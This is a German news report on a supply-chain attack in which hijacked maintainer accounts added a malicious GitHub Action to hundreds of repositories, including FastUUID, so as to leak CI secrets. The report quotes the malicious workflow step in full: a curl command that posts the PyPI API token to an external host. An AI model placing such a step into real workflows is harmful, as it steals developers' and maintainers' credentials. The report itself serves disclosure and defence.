Forscher von GitGuardian haben einen massiven Angriff auf Nutzer von GitHub aufgedeckt, bei dem Kontrolle über 327 Konten erlangt wurde und ein bösartiger Github Action Handler in 817 Repositories eingefügt wurde. Der Angriff führte zu einer Leckage von 3325 Geheimnissen, die in Continuous Integration-Systemen über Umgebungsvariablen übertragen wurden, einschließlich Zugangstokens für PyPI, GitHub, NPM, DockerHub und verschiedene Cloud-Speicher.

GitHub Actions ermöglicht Entwicklern, Handler zur Automatisierung verschiedener Vorgänge in GitHub anzuhängen. Beispielsweise können mit GitHub Actions bestimmte Prüfungen und Tests bei Commits ausgeführt oder die Verarbeitung neuer Issues automatisiert werden. Der bösartige Handler verbreitete sich unter dem Namen „Github Actions Security“ und enthielt im Abschnitt „run“ den Befehl „curl“, der den Inhalt von Umgebungsvariablen bei der Ausführung von Aufgaben in der Continuous Integration-Umgebung an einen externen Host sendete. Der bösartige Commit wurde von Konten der Projekt-Maintainer hinzugefügt, die wahrscheinlich zuvor gehackt oder Opfer von Phishing wurden.
Der Angriff wurde nach der Analyse anomaler Aktivitäten im Zusammenhang mit dem Paket FastUUID, das ein Python-Binding für die Rust-Bibliothek UUID bereitstellt, festgestellt. Das Paket FastUUID, das in der letzten Woche fast 1,2 Millionen Downloads verzeichnete, wird als Abhängigkeit in dem beliebten Projekt LiteLLM verwendet, das in PyPI wöchentlich über 5 Millionen Downloads hat. Eine Analyse der Änderungen im FastUUID-Repository zeigte, dass der Projekt-Maintainer am 2. September einen Commit mit einem neuen Github Action Handler hinzufügte, der den Code zur Sendung des Tokens an das PyPI-Repository an einen externen Host enthielt. — name: Github Actions Security run: | curl -s -X POST -d ‘PYPI_API_TOKEN=${{ secrets.PYPI_API_TOKEN }}’ https://bold-dhawan.45-139-104-115.plesk.page
Das Problem konnte erkannt werden, bevor die Angreifer den abgefangenen Token ausnutzen konnten – es wurden keine bösartigen Änderungen oder modifizierten Versionen des Pakets in PyPI für FastUUID veröffentlicht. Ähnliche Platzhalter von GitHub Action wurden in 816 Repositories festgestellt, deren Eigentümer sowie die Verwaltung von PyPI, GitHub, NPM und DockerHub benachrichtigt wurden. Stand gestern Abend wurden bösartige Commits in etwa 100 Repositories zurückgenommen. Derzeit werden bei der Suche auf GitHub 671 Commits mit bösartigem GitHub Action identifiziert.
Quelle: opennet.ru
